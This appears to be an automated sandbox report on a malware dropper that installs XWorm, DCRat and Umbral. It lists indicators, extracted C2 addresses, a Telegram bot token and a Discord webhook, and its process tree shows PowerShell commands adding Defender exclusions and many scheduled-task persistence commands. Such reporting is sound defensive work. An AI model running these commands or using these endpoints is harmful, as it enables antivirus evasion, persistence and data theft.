Analysis
- max time kernel: 150s
- max time network: 152s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 30-05-2024 12:30
Behavioral task: behavioral1
- Sample: inj.vmp.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: inj.vmp.exe
- Resource: win10v2004-20240426-en
General
- Target: inj.vmp.exe
- Size: 22.7MB
- MD5: dee1c4a8e532d17e7df879ec1a6c976b
- SHA1: 6a037eb25dc446471df9799fabf60e605e609736
- SHA256: 769b8a2310c87fdd9be0e00525d0f347b7e0d7fd8e5ecf17f1aa119889b1e654
- SHA512: 326b6ca9ef7487acf89e4d6a3f29984a371dd20e2e5e0fb3269a4a7ecb79984a3d133617d5025aa759441b1fd54f1953a356ccffa847f17774e3b5ec64b308a3
- SSDEEP: 393216:ML1qcoAyijQ73qEjyqB+oriLjzLYlH5g68q4gsVEmoOZCStRQO2Wv:UqksXyqB3AjPYli6ZRWQO2C
Malware Config
Extracted: xworm
- 5.0
- 127.0.0.1:64360
- 19.ip.gl.ply.gg:64360
- fQ7cS52Kya0qPDrO
- Install_directory: %Public%
- install_file: drivers win gui32-64.exe
- telegram: https://api.telegram.org/bot7428011234:AAGLbtvNd_gYGzKdTJ5RNt6COu1jCeNidCs/sendMessage?chat_id=6043308554
Extracted: umbral
- https://discord.com/api/webhooks/1245665414894063698/9HY7oZoZyztJUOo37jUN0IUaDDWwrbOgYQ06gp0QdpH2eHf05kVC8yRyvqaZKUVdWnAm
Signatures
DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, capable of loading additional plugins.
Detect Umbral payload (2 IoCs)
resource / yara_rule:
- behavioral1/files/0x0008000000014aa2-68.dat: family_umbral
- behavioral1/memory/2724-151-0x0000000000A50000-0x0000000000A90000-memory.dmp: family_umbral
Detect Xworm Payload (2 IoCs)
resource / yara_rule:
- behavioral1/files/0x001500000001471d-49.dat: family_xworm
- behavioral1/memory/2660-162-0x0000000000BB0000-0x0000000000BD8000-memory.dmp: family_xworm
Modifies WinLogon for persistence (2 TTPs, 25 IoCs)
Process spawned unexpected child process (64 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
resource / yara_rule:
- behavioral1/files/0x0015000000014726-50.dat: dcrat
- behavioral1/files/0x0005000000019616-202.dat: dcrat
- behavioral1/memory/1968-203-0x0000000000BE0000-0x0000000000CEE000-memory.dmp: dcrat
- behavioral1/memory/2476-252-0x00000000003C0000-0x00000000004CE000-memory.dmp: dcrat
- behavioral1/memory/1692-274-0x0000000000AC0000-0x0000000000BCE000-memory.dmp: dcrat
Blocklisted process makes network request (1 IoC)
- flow 5, pid 2724: Umbral.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
- pid 676: powershell.exe
- pid 348: powershell.exe
- pid 2332: powershell.exe
- pid 1520: powershell.exe
Executes dropped EXE (9 IoCs)
- pid 2660: 111.exe
- pid 2108: DCRatBuild.exe
- pid 2436: creal.exe
- pid 2724: Umbral.exe
- pid 2796: creal.exe
- pid 1968: Chainblock.exe
- pid 2476: Chainblock.exe
- pid 1692: Idle.exe
- pid 1196: Process not Found
Loads dropped DLL (9 IoCs)
- pid 1032: inj.vmp.exe
- pid 1032: inj.vmp.exe
- pid 1032: inj.vmp.exe
- pid 1032: inj.vmp.exe
- pid 2436: creal.exe
- pid 2796: creal.exe
- pid 3048: cmd.exe
- pid 3048: cmd.exe
- pid 1196: Process not Found
resource / yara_rule:
- behavioral1/memory/1032-42-0x0000000000400000-0x0000000002FD2000-memory.dmp: vmprotect
- behavioral1/memory/1032-53-0x0000000000400000-0x0000000002FD2000-memory.dmp: vmprotect
- behavioral1/memory/1032-66-0x0000000000400000-0x0000000002FD2000-memory.dmp: vmprotect
- behavioral1/memory/1032-159-0x0000000000400000-0x0000000002FD2000-memory.dmp: vmprotect
Adds Run key to start application 2 TTPs 51 IoCs
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
PID 1032 inj.vmp.exe
Drops file in Program Files directory 15 IoCs
All by Chainblock.exe:
- File created: C:\Program Files (x86)\Common Files\lsm.exe
- File created: C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\101b941d020240
- File created: C:\Program Files\Windows Media Player\Network Sharing\6cb0b6c459d5d3
- File created: C:\Program Files (x86)\Google\Temp\sppsvc.exe
- File created: C:\Program Files (x86)\Windows Mail\es-ES\ebf1f9fa8afd6d
- File created: C:\Program Files (x86)\Google\Temp\0a1fd5f707cd16
- File created: C:\Program Files\Windows Media Player\Visualizations\winlogon.exe
- File created: C:\Program Files\Windows Media Player\Network Sharing\dwm.exe
- File opened for modification: C:\Program Files (x86)\Google\Temp\sppsvc.exe
- File created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\explorer.exe
- File created: C:\Program Files (x86)\Windows Mail\es-ES\cmd.exe
- File created: C:\Program Files\Windows Media Player\Visualizations\cc11b995f2a76d
- File created: C:\Program Files (x86)\Common Files\101b941d020240
- File created: C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\lsm.exe
- File created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\7a0fd90576e088
Drops file in Windows directory 10 IoCs
All by Chainblock.exe:
- File created: C:\Windows\rescache\rc0006\lsass.exe
- File created: C:\Windows\system\creal.exe
- File created: C:\Windows\Downloaded Program Files\csrss.exe
- File created: C:\Windows\L2Schemas\creal.exe
- File created: C:\Windows\L2Schemas\55535abbd66d66
- File created: C:\Windows\Downloaded Program Files\886983d96e3d3e
- File created: C:\Windows\Help\Windows\ja-JP\creal.exe
- File created: C:\Windows\Help\Windows\ja-JP\55535abbd66d66
- File created: C:\Windows\system\55535abbd66d66
- File created: C:\Windows\rescache\rc0006\explorer.exe
Detects Pyinstaller 1 IoCs
resource / yara_rule:
- behavioral1/files/0x000d000000014971-63.dat: pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses 36 IoCs
PIDs (repeated hits collapsed): 1032 inj.vmp.exe; 2332, 1520, 676 and 348 powershell.exe; 2660 111.exe; 1968 and 2476 Chainblock.exe; 1692 Idle.exe
Suspicious use of AdjustPrivilegeToken 50 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
PID 2660 111.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(indentation reflects the parent/child depth reported by the sandbox)

C:\Users\Admin\AppData\Local\Temp\inj.vmp.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\inj.vmp.exe"
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 1032

  C:\Users\Admin\AppData\Local\Temp\111.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\111.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID: 2660

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\111.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2332

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '111.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1520

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\drivers win gui32-64.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 676

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'drivers win gui32-64.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 348

  C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 2108

    C:\Windows\SysWOW64\WScript.exe
      cmdline: "C:\Windows\System32\WScript.exe" "C:\driverdllnetdhcp\F9mnHWtyAUd0Q4P2aZ3fzq.vbe"
      - Suspicious use of WriteProcessMemory
      PID: 1312

      C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c ""C:\driverdllnetdhcp\nZjz3z5F13Ya5AH4Q7c.bat" "
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 3048

        C:\driverdllnetdhcp\Chainblock.exe
          cmdline: "C:\driverdllnetdhcp\Chainblock.exe"
          - Modifies WinLogon for persistence
          - Executes dropped EXE
          - Adds Run key to start application
          - Drops file in Program Files directory
          - Drops file in Windows directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 1968

          C:\Windows\System32\cmd.exe
            cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ycaMgafzeK.bat"
            - Suspicious use of WriteProcessMemory
            PID: 2600

            C:\Windows\system32\w32tm.exe
              cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              PID: 1800

            C:\driverdllnetdhcp\Chainblock.exe
              cmdline: "C:\driverdllnetdhcp\Chainblock.exe"
              - Modifies WinLogon for persistence
              - Executes dropped EXE
              - Adds Run key to start application
              - Drops file in Program Files directory
              - Drops file in Windows directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
              PID: 2476

              C:\Windows\System32\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\f3YgPfhNWN.bat"
                - Suspicious use of WriteProcessMemory
                PID: 2008

                C:\Windows\system32\w32tm.exe
                  cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  PID: 2816

                C:\Users\Default User\Idle.exe
                  cmdline: "C:\Users\Default User\Idle.exe"
                  - Executes dropped EXE
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 1692

  C:\Users\Admin\AppData\Local\Temp\creal.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\creal.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 2436

    C:\Users\Admin\AppData\Local\Temp\creal.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\creal.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      PID: 2796

  C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    - Blocklisted process makes network request
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2724

    C:\Windows\System32\Wbem\wmic.exe
      cmdline: "wmic.exe" csproduct get uuid
      - Suspicious use of AdjustPrivilegeToken
      PID: 1616
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\My Documents\creal.exe'" /f1⤵
- Process spawned unexpected child process
PID:1676
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\Users\Admin\My Documents\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\My Documents\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 12 /tr "'C:\driverdllnetdhcp\creal.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\driverdllnetdhcp\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 14 /tr "'C:\driverdllnetdhcp\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2524
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\es-ES\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\es-ES\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\es-ES\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2604
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\Visualizations\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Visualizations\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2824
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 8 /tr "'C:\Windows\Help\Windows\ja-JP\creal.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\Windows\Help\Windows\ja-JP\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\Windows\ja-JP\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\Idle.exe'" /f1⤵
- Process spawned unexpected child process
PID:1324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "1111" /sc MINUTE /mo 13 /tr "'C:\driverdllnetdhcp\111.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2768
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "111" /sc ONLOGON /tr "'C:\driverdllnetdhcp\111.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
PID:2932
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1111" /sc MINUTE /mo 12 /tr "'C:\driverdllnetdhcp\111.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1808
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\driverdllnetdhcp\csrss.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1032
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\driverdllnetdhcp\csrss.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1868
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\driverdllnetdhcp\csrss.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\lsm.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1052
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\lsm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:720
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\lsm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2956
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crealc" /sc MINUTE /mo 5 /tr "'C:\Windows\system\creal.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2000
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\Windows\system\creal.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2064
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crealc" /sc MINUTE /mo 12 /tr "'C:\Windows\system\creal.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:656
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2092
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2268
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:840
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\wininit.exe'" /f
- Process spawned unexpected child process
PID:312
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\wininit.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1772
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\wininit.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
PID:1592
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1768
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1864
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1728
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\dwm.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:908
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\dwm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:912
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\dwm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2332
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\explorer.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1780
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\explorer.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:584
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\explorer.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3024
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2036
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1828
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
PID:1044
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\driverdllnetdhcp\lsm.exe'" /f
- Process spawned unexpected child process
PID:1552
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\driverdllnetdhcp\lsm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2516
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\driverdllnetdhcp\lsm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1752
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Google\Temp\sppsvc.exe'" /f
- Process spawned unexpected child process
PID:1560
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\sppsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2180
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Google\Temp\sppsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2428
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2536
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1628
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1712
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /rl HIGHEST /f
- Creates scheduled task(s)
PID:3016
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /rl HIGHEST /f
- Creates scheduled task(s)
PID:2724
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Idle.exe'" /f
- Creates scheduled task(s)
PID:276
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
- Creates scheduled task(s)
PID:704
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
- Creates scheduled task(s)
PID:1504
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crealc" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\creal.exe'" /f
- Creates scheduled task(s)
PID:1528
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\Windows\L2Schemas\creal.exe'" /rl HIGHEST /f
- Creates scheduled task(s)
PID:780
-
